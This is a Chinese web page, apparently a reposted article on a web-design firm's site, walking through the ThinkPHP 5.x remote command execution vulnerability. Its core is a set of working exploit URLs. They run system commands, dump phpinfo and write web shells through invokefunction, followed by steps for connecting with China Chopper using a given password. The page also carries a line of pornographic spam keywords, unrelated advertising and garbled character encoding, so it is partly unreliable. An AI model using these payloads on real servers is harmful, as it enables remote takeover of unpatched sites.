真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

thinkphp_5x_命令執(zhí)行漏洞的示例分析

這篇文章主要介紹thinkphp_5x_命令執(zhí)行漏洞的示例分析,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

成都創(chuàng)新互聯(lián)從2013年成立,先為峨山縣等服務(wù)建站,峨山縣等地企業(yè),進(jìn)行企業(yè)商務(wù)咨詢服務(wù)。為峨山縣企業(yè)網(wǎng)站制作PC+手機(jī)+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問題。

thinkphp_5x_命令執(zhí)行漏洞

受影響版本包括5.0和5.1版本

docker漏洞環(huán)境源碼:
https://github.com/vulnspy/thinkphp-5.1.29
本地環(huán)境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函數(shù)遠(yuǎn)程命令執(zhí)行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通過phpinfo函數(shù)寫出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

寫入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK

使用菜刀連接
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php   密碼為zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php        密碼為zane

以上是“thinkphp_5x_命令執(zhí)行漏洞的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對(duì)大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!


網(wǎng)頁名稱:thinkphp_5x_命令執(zhí)行漏洞的示例分析
當(dāng)前URL:http://weahome.cn/article/psgepc.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部